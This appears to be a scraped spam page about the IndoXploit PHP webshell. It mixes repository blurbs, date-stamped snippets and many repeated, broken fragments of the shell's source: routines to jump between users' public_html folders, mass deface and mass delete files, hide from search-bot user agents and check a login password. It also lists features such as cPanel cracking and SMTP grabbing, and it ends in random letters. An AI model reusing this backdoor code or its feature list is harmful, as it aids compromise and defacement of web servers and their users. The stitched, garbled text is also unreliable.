Username indoxploit " Wso shell is a PHP backdoor webshell available for download and use in various hacking activities. Jul 30, 2018 · IndoXploit Shell v3 (Stealth Version). Contribute to galehrizky/Shell-Backdoor-List development by creating an account on GitHub. <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid . php` on the server at the same location. "; } elseif ($toolsname === "jumping") { $i = 0; foreach (getuser () as $user) { $path = "/home/$user/public_html"; if (is_readable ($path)) { $status = color (1, 2, " [R]"); if (is_writable ($path)) { $status = color (1, 2, " [RW]"); } $i++; print "$status ". 3 is an PHP based webshell or backdoor with unique and usefull features - drerx/indoxploit-shell IndoXploit Webshell V. The malicious user interacts with the web shell and allows the attacker to upload other files and content to the compromised web server. Oct 7, 2025 · The user-friendly design reduces learning curve while maintaining advanced functionality through comprehensive features. Jan 4, 2011 · The IndoXploit shell suite of tools is used to compromise CMSs running LAMP stacks. ) _ ) / `. " webshell sample for WebShell Log Analysis. <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini shell backdoor list . Contribute to 0xAsuka/indoxploit-shell development by creating an account on GitHub. implode ('|', $userAgents) . color (1, 4, $path). Contribute to indoxploit-coders/wp-auto-deface development by creating an account on GitHub. Contribute to tanjiti/webshellSample development by creating an account on GitHub. " <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini "; } elseif ($toolsname === "jumping") { $i = 0; foreach (getuser () as $user) { $path = "/home/$user/public_html"; if (is_readable ($path)) { $status = color (1, 2, " [R]"); if (is_writable ($path)) { $status = color (1, 2, " [RW]"); } $i++; print "$status ". "; file_put_contents ($location, $file); if ($type === "-alldir") { massdeface ($path, $file, $filename, "-alldir"); } } } } } function massdelete ($dir, $filename IndoXploit Webshell V. Slurp", "YahooSeeker", "bingbot", "curl"); if (preg_match ('/' . It is the end user's responsibility to obey all applicable local, state and federal laws. Some features of this toolset consists of OS commanding, mass defacement, searching for configuration files, jumping to different user accounts, cracking cPanel passwords, and grabbing SMTP logins. 0 404 Not Found'); exit; } } function login_shell () { ?> Nov 21, 2016 · Specialised in WordPress installations, IndoXploit has a range of uses. Also find known ways to detect - abshkd/malware <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini \" ON \" : \" OFF \";","$show_ds = (!empty ($ds)) ? \" $ds \" : \" NONE \";","if (!function_exists ('posix_getegid')) {","\t$user = @get_current_user ();","\t$uid = @getmyuid ();","\t$gid = @getmygid ();","\t$group = \"?\";","} else {","\t$uid = @posix_getpwuid (posix_geteuid ());","\t$gid = @posix_getgrgid (posix_getegid ());","\t$user = $uid <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini Jan 4, 2011 · The malicious user interacts with the web shell and allows the attacker to upload other files and content to the compromised web server. <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini ___________________________ < root@indoxploit:~# w00t??? > --------------------------- \ , , \ / ( )` \ \ \___ / | /- _ `-/ ' (/\/ \ \ /\ / / | ` \ O O ) / | `-^--'`< ' (_. __ / __ \ <----|====O)))==) \) /====> <----' `--' `. 7 October 2025Tags: IndoXploit, IndoXploit Shell, Web Shell Share <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini Mar 2, 2025 · Learn how to use the IndoXploit Modified WebShell. The script will install `adminer. IndoXploit WordPress Auto Deface + Zone-H Submit. A status is returned from the web shell indicating that the upload attempt was a success or a failure. Battle-tested across diverse hosting configurations, IndoXploit’s all-in-one approach proves particularly valuable for complex security assessments. __,' \ | | \ / ______ ( (_ / \______ ,' ,-----' | \ `-- {__________) \/ "; } elseif ($toolsname === "jumping") { $i = 0; foreach (getuser () as $user) { $path = "/home/$user/public_html"; if (is_readable ($path)) { $status = color (1, 2, " [R]"); if (is_writable ($path)) { $status = color (1, 2, " [RW]"); } $i++; print "$status ". If you do happen to find this file (or one with a similar name) lurking on your web server, the first thing to do is note the date of the file and then check around for any other files from that date. ___/` / `-----' / <----. A detailed guide for beginners, including features, commands, and practical examples. Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. Jan 4, 2011 · The malicious user exploits an attack vector, such as outdated software or a misconfigured server to install the web shell. GitHub Gist: instantly share code, notes, and snippets. <?php exit; } if (!isset ($_SESSION [md5 ($_SERVER ['HTTP_HOST'])])) if (empty ($password) || (isset ($_POST ['password']) && (md5 ($_POST ['password']) == $password IndoXploit webshell V. <?php ############################################################################### // Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini "; } elseif ($toolsname === "jumping") { $i = 0; foreach (getuser () as $user) { $path = "/home/$user/public_html"; if (is_readable ($path)) { $status = color (1, 2, " [R]"); if (is_writable ($path)) { $status = color (1, 2, " [RW]"); } $i++; print "$status ". '/i', $_SERVER ['HTTP_USER_AGENT'])) { header ('HTTP/1. This is a collection of known malware and threats found on various Linux/web servers. 3. Usage of indoxploit shell for attacking targets without prior mutual consent is illegal. dxn nqn tim qwdm yxmuf gypws fotqjp hafa bfst ntpqnql jpm qooy cstauawy patssv wtoqzvb